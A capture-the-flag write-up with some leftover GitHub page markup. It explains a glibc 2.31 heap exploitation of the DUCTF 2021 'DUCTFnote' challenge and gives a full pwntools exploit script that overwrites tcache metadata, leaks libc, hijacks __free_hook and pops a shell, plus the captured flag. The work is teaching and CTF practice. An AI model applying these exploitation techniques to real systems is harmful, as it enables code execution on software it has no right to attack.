<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>flag.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
# DUCTFnote
DUCTFnote was a heap challenge from DUCTF2021 that at the end of the CTF finished with 28 solves and a value of 471 points. I actually solved the challenge an hour after the CTF finished, but enjoyed the task (thanks to grub for writing it), so thought I would do a write-up.

## Provided files
We are giving the binary itself `ductfnote`, the libc binary `libc-2.31.so` and the source of the challenge `ductfnote.c`. Having the source is really nice, because we can skip some reversing and do some source code analysis to find the bugs.
### ductfnote
Looking at the binary itself:
```bash$ checksec ductfnote[*] '~/CTF/DUCTF/2021/pwn/DUCTFnote/ductfnote' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled$```
We can see it has got fairly standard protections for a heap challenge.
### libc-2.31.so
The version of libc is identified by [libc-database](https://github.com/niklasb/libc-database) as `libc6_2.31-0ubuntu9.2_amd64` (which means it's a standard unmodified version of libc).
```bash$ md5sum libc-2.31.sod371da546786965fe0ee40147ffef716 libc-2.31.so$```
In terms of libc mitigations: * It's above 2.29 - so keys have been added to the tcache (as double free mitigation). * It's below 2.32 - so no pointer mangling for singly linked list ([Safe Unlinking](https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/)). * It's below 2.34 - so tcache key is not randomised and `__malloc_hook` and `__free_hook` still avaliable.
## Challenge overview
If we run the challenge we are greeted with a fancy banner and a menu:
```bash$ ./ductfnote %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%..............%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%% ,% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ,% %%%%%%%% %%%%%%%%%%%%% ,% %%%%%%%% %%%% %%%%%%%%%%%%%%%%%%%%% ,% %%%%%%%% %%%%%\ %%%%%%%%%% %%##% %%%%%%%% %%%%%%\ %%%%%%%%%%%%%%%%%%% %% ,% %%%%%%%% %%%%%%% %%%%%%%%% %% ,% %%%%%%%% %%%%%%% %%%%%%%%% %%%%% %%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%% %% ,% %%%%%%%% %%%%%%/ %%%%%%%%%% %% ,% %%%%%%%% %%%%/ %%%%%%%%%%%.......... %%%%%%%% %%%%%%%%%%%%% %% ,% %%%%%%%%%%%%%%%%%%%%%%%%%%%% %% ,% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%% %%%%%%%
******************************************* * DUCTFnote * *******************************************
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
The description of the challenge was "You only get OneNote" (hence the ascii art banner is a play on the [OneNote logo](https://upload.wikimedia.org/wikipedia/commons/9/9e/Microsoft_OneNote_2013_logo.svg)), but this is also due to the fact that the challenge only holds a single pointer to a note.
### Create Note
If we pick `1. Create Note`:
```bash>> 1
Size: ```
We have the option to provide a size, it then uses that value to determine the size it will use in the malloc request (but as you will see, it is not simply using that value). Let's look at the code for note creation:
```c case 1: printf("Size: "); unsigned int size; scanf("%d", &size); getchar(); note = create_note(size, params); break;```
So, it reads the size and passes it to `create_note`, which then populates our single pointer (called `note`). Note is a local variable of main:
```c datanote_t* note = NULL;```
But, clearly note is a pointer to some kind of structure (rather than just some data), so let's take a look at that type:
```ctypedef struct datanote { unsigned int size; char data;} datanote_t;```
So, note stores the size of the data followed by the data. Before we move onto the code for `create_note`, we should look at that `params` argument that is also being passed. It is initialized at the start of `main`:
```c param_t* params = (param_t*)malloc(sizeof(param_t)); params->maxsize = 0x7f;```
That `maxsize` attribute that we see being set, is the only member of the struct:
```ctypedef struct param { unsigned int maxsize;} param_t;```
So, now we have a good idea of the arguments being passed to `create_note`, let's examine the code:
```cdatanote_t * create_note(unsigned int size, param_t *params) { if (size > params->maxsize) { printf("Note too big.\n"); return 0; } int allocsize = size | 0x80; datanote_t * note = (datanote_t*)malloc(allocsize + 8); note->size = size; return note;}```
So the size is going to get checked against `maxsize` (which we know is 0x7f) and if it is found to be greater, it will just return zero. But after that point, things get interesting...
The size we provide is OR'd with 0x80 (effectively adding 0x80 to the value we provide) and then before the malloc, 8 is added to the size again. This means that even if we provide a size of 0, this will first have 0x80 added to it, then another 8, which would then result in a 0x90 byte chunk (the smallest size we can allocate). The largest size we can supply is 0x7f, which would then result in a 0x110 sized chunk.
Finally we can see that the value stored as the `size` attribute of the chunk is the original size value we supplied (with none of the addtions done to it).
### Edit Note
If we have created a note, we can edit it with the `3. Edit Note` option.
```bash>> 1
Size: 16
1. Create Note2. Show Note3. Edit Note4. Delete Note>> 3
AAAAAAAAAAAAAAAA
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
If we look at the code it is very simple:
```c case 3: edit_note(note); break;```
Which then calls:
```cvoid edit_note(datanote_t * note) { if(!note) { printf("No Note.\n"); return; }
signed char idx = 0; while(idx <= note->size) { *(&(note->data)+idx) = fgetc(stdin); if (*(&(note->data)+idx) == '\n') {*(&(note->data)+idx) = '\0'; break;} idx++; }}```
This is going to first check we have a note and then it will use that size field that got populated during creation to limit how many characters we can write. The loop will also exit early if we supply a newline character.
So after the above example (where we gave a size of 16 and then 16 bytes of data), the memory looks like:

We get a 0xa0 byte chunk and in the data, we get a `size` field of 0x10, followed by that many 'A' chars.
Worth noting at this point that the chunk before the one we allocated is the params object with the maxsize field in it. The chunk before that (the first on the heap) is the `tcache_perthread_struct`, which we'll talk about more later, but if you're not familiar with it, know that it is the metadata for the tcache.
### Show Note
If we select the `2. Show Note` option, we can display the data held in the note:
```bash>> 2
<------------ NOTE 1 ------------>AAAAAAAAAAAAAAAA<-------------------------------->
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
The code for this is again very simple:
```c case 2: show_note(note); break;```
Which calls:
```cvoid show_note(datanote_t * note) { if(!note) { printf("No Note.\n"); return; }
printf("<------------ NOTE 1 ------------>\n"); fwrite(&(note->data), note->size, 1, stdout); printf("\n"); printf("<-------------------------------->\n"); printf("\n");}```
It checks the `size` from the header and then does an fwrite of that amount from the `data` field. The use of fwrite, means we have no opportunity for format string bugs or leaks via pressing our string right up to some target data, but it also means we don't have to worry about our data having NULL bytes in it.
### Delete Note
If we pick the `4. Delete Note` option, we can free the note:
```bash>> 4
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
The code for which is simple:
```c case 4: free(note); note = 0; break;```
It does zero out the `note` pointer, so we can't get a double free and obviously you can call this when note is not populated, but that is just going to do a `free(0)` which returns harmlessly.
## Bugs
### Uninteresting NULL pointer dref
Not interesting to us, but because we can create a new chunk, without free'ing the old chunk and there is no limit to the number of chunks we can allocate, we could just keep requesting chunks until we exhaust the amount of memory our process is able to allocate. Then in the `create_note` code:
```c datanote_t * note = (datanote_t*)malloc(allocsize + 8); note->size = size;```
It fails to check the return value from `malloc`, so if malloc fails it will return NULL and then it will try to dereference that NULL pointer, causing a crash.
Again, not useful, but a bug none the less.
### Useful bug
You might have already spotted the bug in the `edit_note` loop code. If we look at it:
```c signed char idx = 0; while(idx <= note->size) { *(&(note->data)+idx) = fgetc(stdin); if (*(&(note->data)+idx) == '\n') {*(&(note->data)+idx) = '\0'; break;} idx++; }```
The check for the index (`idx`) against the `size` field is a less than or equal, and with the index starting at zero this means that we can actually write one byte more than the size we asked for. For example:
```bashSize: 16
1. Create Note2. Show Note3. Edit Note4. Delete Note>> 3
BBBBBBBBBBBBBBBBB
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
Here I have asked for 16, but have written 17 'B' characters. If we check that out in memory:

We could start thinking about overflowing into another chunk but remember the size of our chunk is our value with 0x88 added to it (so it's going to be much larger than the amount we can write). But there is another interesting aspect to this, because `idx` is a signed character, if we ask for the largest size we can (0x7f or 127) the bug will allow us to write 128 chracters (making `idx` 0x7F), but then when it does the `idx++;` it will set the value to be 0x80, which for a signed char will be -127. Obviously -127 is less than or equal to 127, so the loop continues.
We can test this by asking for a size of 127 and then supplying 128 'A's and one 'B':
```>> 1
Size: 127
1. Create Note2. Show Note3. Edit Note4. Delete Note>> 3
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
No objections. And if we check memory:

We can see that the one 'B' is written backwards in memory, into the space of the `tcache_perthread_struct` entry. If we were to continue writing we would overwrite more bytes, growing towards our 'A's. With this bug we can control the 128 bytes before our `data` field.
## Exploitation
### Removing the 0x7f size restriction
The plan is to use the negative index overflow to modify all the way down until we overwrite the `maxsize` attribute of the `params` struct.
I used the following:
```pythonalloc(127)buff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*84 # fill space (in tcache meta data) till we hit start of params chunkbuff+= p64(0x21) # leave header of params chunk in tact (dont have to, but why not?)buff+= p64(0xffffffff) # alter maxsize to be max int.edit(buff)```
If we look at memory after this has executed:

After we have done this we can now ask for a size larger than 127:
```bash1. Create Note2. Show Note3. Edit Note4. Delete Note>> 1
Size: 1337
1. Create Note2. Show Note3. Edit Note4. Delete Note>> ```
### Getting libc addresses onto the heap
If we wanted a heap leak, this version of libc makes it fairly easy due to the `key` field of the free'd tcache chunks pointing into the `tcache_perthread_struct`. For example free'ing a 0xa0 sized chunk:

And when I was developing the exploit I did this first, but later decided it wasn't useful. What we really want is a libc address and to get that we need the free'd chunk to be in one of the doubly linked bins (not tcache and not fastbin).
A classic way to do this would be to pick a size above fastbin sizes (>0x80 by default) and then free enough chunks to fill the tcache (7 chunks) so the next one would be put into a non-tcache bin. But we can't easily free multiple chunks of the same size into a tcache bin, because you can only free the thing you have most recently allocated, so if you free'd an 0xa0 chunk into the tcache, you would then need to get another 0xa0 sized chunk, and to do that you would need to malloc a new 0xa0 sized chunk, which would then give you back the one you just free'd.
The next way to do it would be to pick a size outside of tcache range (>0x410) and you might think this would be easy now that we have made it so we can allocate any size.. however, if free a chunk is outside of tcache range, unless there is a chunk between it and the top chunk, it is just going to be consolidated into the top chunk.
The solution is to craft our own sufficiently large chunk by messing with chunk header sizes. We take two tcache size chunks (the size of which combined would be outside of tcache range) and then change the size of the first to cover both of them. We will also have to have a chunk following them to prevent consolidation.
Here is my code for this:
```pythonalloc(0x200) free()alloc(0x210)free()alloc(30) # acts as guard to prevent consolidationfree()```
If we inspect memory after this:

So we have create a 0x290 chunk, followed by a 0x2a0 chunk, followed by a 0xb0 size chunk.
We then use the index overflow trick on the first of these three new chunks to change its chunk size field.(We make the new chunksize exactly fit over the two chunks: 0x290 + 0x2a0 = 0x530)
```pythonalloc(0x200)buff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*116 # pad until we hit the size field of the chunkbuff+= p64(0x531) # new chunk size (completely overlaps next chunk)edit(buff)```
Inspecting the memory:

Then we free it:
```pythonfree()```

Now we just need to leak one of those pointers.
### Leaking the pointers
With hindsight, if I had picked my new large chunk size more carefully (making it something I could allocate back, without the OR with 0x80 getting in the way), I could have used the fact that the `create_note` doesn't zero out the data to use a show on the chunk, and simply get the value. But.. as I mentioned before, I had been doing a leak of the `key` field of tcache chunks and those do get zero'd when the chunk is allocated, so I had to come up with another way.. which I just reused for this.
I used our initial '127' chunk and overflowed it again to change the size field of the `datanote_t` struct to be large enough that it would include the start of the 0x530 chunk:
```pythonalloc(127) # get our initial '127' chunk againbuff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*84 # fill space (in tcache meta data) till we hit start of params chunkbuff+= p64(0x21) # leave header in tactbuff+= p64(0xffffffff) # leave max size modifiedbuff+= p64(0)+p64(0) # pad the rest of that 0x20 chunkbuff+= p64(0x111) # keep our chunk size in tactbuff+= p32(0x120) # modify the size field of our datanote_t structedit(buff)```

Now I just request the content of the note and extract the bytes I need:
```pythondata = show()# extract just the addr and calculate the libc base from itaddr = u64(data[268:276])info(f'leaked libc addr: 0x{addr:x}')libc.address = addr - 0x1ebbe0info(f'libc base: 0x{libc.address:x}')```
Which gives:
```bash[*] leaked libc addr: 0x7f622ba86be0[*] libc base: 0x7f622b89b000```
### Allocating the address of free hook
With the lack of safe unlinking (introduced in glibc 2.32), it might seem like an easy way to get an arbitary address allocated back to you would be to modify the data of the `fd` pointer of a free'd chunk in a tcache bin. However, you would then need to request that chunk back to you (making your desired location the head of that tcache bin) and then do a final allocation to get that address allocated to you. The issue is that the tcache keeps track of the number of chunks in each tcache bin and will not allocate a chunk to you (even if the pointer for that bin is not NULL) if the count for that bin is zero. So, to make this work, we would need to have the count be more than one when we do the overwrite, however we have already discussed the issues with getting more than one chunk into a tcache bin in this challenge.
A far easier way in this case, is to simply target the pointers to the heads of the tcache bins, which are store inside the `tcache_perthread_struct` (which we know we can overwirte some of).
Let's look at the definition of the `tcache_perthread_struct`:
```c/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */typedef struct tcache_perthread_struct{ char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS];} tcache_perthread_struct;```
So, an array of counts and then an array of points to the bins for those counts.The size of the count fields change depending on the version of glibc, in the code above it is represented by a single byte, but since glibc 2.31 (which we are using), this has changed to be a `uint_16`.
Currently in our tcache we still have 2 chunks, the guard chunk (0xb0), and the second of the chunks that we used to make the 0x530 chunk (0x2a0). So if we inspect the memory:

You can see two non-zero count fields and two non-zero pointers.
We can only overwrite the latter part of the structure (containing the pointers to the larger sized tcache bins) and certainly not the part containing the counts. So we need the count for the bin pointer we intend to overwrite to already be non-zero.
If I had wanted to optimize my solution I would have used a larger chunk for the 'guard chunk' from earlier, and thus saved a step now, but when I know I might be writing something up later, I try to keep the steps as distinct as possible.
So we simply allocate a chunk of a size near the end of the tcache range and then free it:
```pythonalloc(0x3f8)free()```

This has created a chunk well within the range of our overflow from the '127' chunk.Now we just have to write the address of `__free_hook` over that pointer.. well.. almost.. we have to take account of the fact that we don't get to control the very start of the data for the allocated chunk (because the 4 byte size field gets written there), but we can work around this by just subtracting 8 bytes from the address:
```pythonalloc(127)# Now do the overflow again, but this time we want to mess with the pointer# for the 0x3f8 chunk we just free'd in the tcache meta databuff = b'A'*128buff+= b'B'*68buff+= p64(libc.symbols.__free_hook-8) # aim 8 bytes back (because of size field)edit(buff)```
Inspecting memory:

Now we allocate another chunk of that size and we will be given a pointer to just before `__free_hook`. We then just overwrite its content (accounting for the padding for the size field):
```pythonalloc(0x3f8)edit(b'P'*4 + p64(libc.symbols.system)) # overwrite (accoutning for 4 bytes of pad)```
Which when inspect with gdb, gives:
```bashpwndbg> x/gx &__free_hook0x7f622ba89b28 <__free_hook>: 0x00007f622b8f0410pwndbg> x/2i 0x00007f622b8f0410 0x7f622b8f0410 <__libc_system>: endbr64 0x7f622b8f0414 <__libc_system+4>: test rdi,rdipwndbg> ```
### Triggering free hook to get shell
We now need a chunk containing '/bin/sh' that we can free to get a shell. To do this, I will once more allocate our '127' chunk and use its overflow to modify the chunk data to be '/bin/sh':
```pythonalloc(127) # use '127' chunk againbuff = b'A'*128 # fill till offset goes negativebuff+= b'B'*124 # pad till we reach chunk data buff+= b'/bin/sh\x00' # place '/bin/sh' stringedit(buff)```
Which gives:

The heap visualization is a bit messed up (because I trashed the headers for the chunk - I could have fixed these up, but we really don't need them any more).
Finally we just free the chunk to get a shell:
```pythonfree()io.interactive()```
## Running solution
```bash$ ./exploit.py REMOTE[*] '~/CTF/DUCTF/2021/pwn/DUCTFnote/ductfnote' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled RPATH: b'.'[*] '~/CTF/DUCTF/2021/pwn/DUCTFnote/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled[+] Opening connection to pwn-2021.duc.tf on port 31917: Done[*] leaked libc addr: 0x7fd873ca8be0[*] libc base: 0x7fd873abd000[*] Switching to interactive mode$ ls -l
total 2200-rw-r--r-- 1 65534 65534 42 Sep 17 11:24 flag.txt-rwxr-xr-x 1 65534 65534 191472 Sep 17 11:24 ld-2.31.so-rwxr-xr-x 1 65534 65534 2029224 Sep 17 11:24 libc.so.6-rwxr-xr-x 1 65534 65534 21832 Sep 17 12:29 pwn$ cat flag.txtDUCTF{n0w_you_4r3_r34dy_f0r_r34l_m$_0d4y}$ ```
## Full solution script
```python#!/usr/bin/env python3from pwn import *
exe = context.binary = ELF('./ductfnote')libc = exe.libc
gdbscript = '''set disassembly-flavor inteltbreak maincontinue'''
if args.REMOTE: io = remote('pwn-2021.duc.tf', 31917)elif args.GDB: io = gdb.debug(exe.path, gdbscript=gdbscript)else: io = process(exe.path)
def alloc(size): ''' it allocates 8 bytes extra anyway ''' io.sendlineafter(b'>> ', b'1') io.sendlineafter(b'Size: ', f'{size:d}')
def free(): io.sendlineafter(b'>> ', b'4')
def edit(data): io.sendlineafter(b'>> ', b'3') io.sendline(data)
def show(): io.sendlineafter(b'>> ', b'2') io.recvuntil(b'NOTE 1 ------------>\n') ret=io.recvuntil(b'<-------------------------------->\n', drop=True) return ret
###################################################################### Overflow using the negative index to modify the params size field ######################################################################alloc(127)buff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*84 # fill space (in tcache meta data) till we hit start of params chunkbuff+= p64(0x21) # leave header of params chunk in tact (dont have to, but why not?)buff+= p64(0xffffffff) # alter maxsize to be max int.edit(buff)
###################################################################### Craft a chunk outside of tcache range ######################################################################
# Allocate some more chunks after (free'ing each time)## Can pick whatever sizes we want, but needs to add up to a# size outside of tcache chunk range (>0x410) and avoid re-using# our initial chunk size.#free() # free our inital '127' sized chunk (for use again later)alloc(0x200) free()alloc(0x210)free()alloc(30) # acts as guard to prevent consolidationfree()
# re-allocate the first of those three and use the overflow to mod its sizealloc(0x200)buff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*116 # pad until we hit the size field of the chunkbuff+= p64(0x531) # new chunk size (completely overlaps next chunk)edit(buff)# now free it to create a non-tcache sized free chunk (with libc pointers)free()
###################################################################### Leak pointer from free'd 0x530 chunk ######################################################################
# We use our initial '127' chunk again over an overflow. But this time# the target is the size field in the data of our chunk (changing the 0x7F)# to something larger.alloc(127) # get our initial '127' chunk againbuff = b'A'*128 # fill till offset goes negativebuff+= b'\x00'*84 # fill space (in tcache meta data) till we hit start of params chunkbuff+= p64(0x21) # leave header in tactbuff+= p64(0xffffffff) # leave max size modifiedbuff+= p64(0)+p64(0) # pad the rest of that 0x20 chunkbuff+= p64(0x111) # keep our chunk size in tactbuff+= p32(0x120) # modify the size field of our datanote_t structedit(buff)
# Now 'show the data'data = show()# extract just the addr and calculate the libc base from itaddr = u64(data[268:276])info(f'leaked libc addr: 0x{addr:x}')libc.address = addr - 0x1ebbe0info(f'libc base: 0x{libc.address:x}')
###################################################################### Overwirte an existing tcache pointer with &__free_hook ######################################################################
# Free our '127' chunk (so we can get it back later)free()
# Now allocate a chunk and free into the tcache (to set the count for# that tcache size to one).alloc(0x3f8)free()
# Now get our first chunk backalloc(127)# Now do the overflow again, but this time we want to mess with the pointer# for the 0x3f8 chunk we just free'd in the tcache meta databuff = b'A'*128buff+= b'B'*68buff+= p64(libc.symbols.__free_hook-8) # aim 8 bytes back (because of size field)edit(buff)
# free the '127' chunk once more (so we can get it back later)free()
# now try to alloc the __freehook back to us as a chunkalloc(0x3f8)edit(b'P'*4 + p64(libc.symbols.system)) # overwrite (accoutning for 4 bytes of pad)
###################################################################### Create a chunk containing '/bin/sh' we can free ######################################################################
alloc(127) # use '127' chunk againbuff = b'A'*128 # fill till offset goes negativebuff+= b'B'*124 # pad till we reach chunk data buff+= b'/bin/sh\x00' # place '/bin/sh' stringedit(buff)
###################################################################### Pop a shell and win ######################################################################
free()io.interactive()```
## Appendix - Challenge source
```c#include <stdlib.h>#include <stdio.h>#include <malloc.h>
typedef struct param { unsigned int maxsize;} param_t;
typedef struct datanote { unsigned int size; char data;} datanote_t;
void init();void welcome();void print_menu();datanote_t * create_note(unsigned int size, param_t* params);void show_note(datanote_t * note);void edit_note(datanote_t * note);
int main() { init(); welcome();
int choice; datanote_t* note = NULL; param_t* params = (param_t*)malloc(sizeof(param_t)); params->maxsize = 0x7f;
while(1) { print_menu();
scanf("%d", &choice); getchar(); printf("\n"); switch (choice) { case 1: printf("Size: "); unsigned int size; scanf("%d", &size); getchar(); note = create_note(size, params); break; case 2: show_note(note); break; case 3: edit_note(note); break; case 4: free(note); note = 0; break; default: printf("Invalid option.\n"); } }
return 0;}
void init() { setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0);}
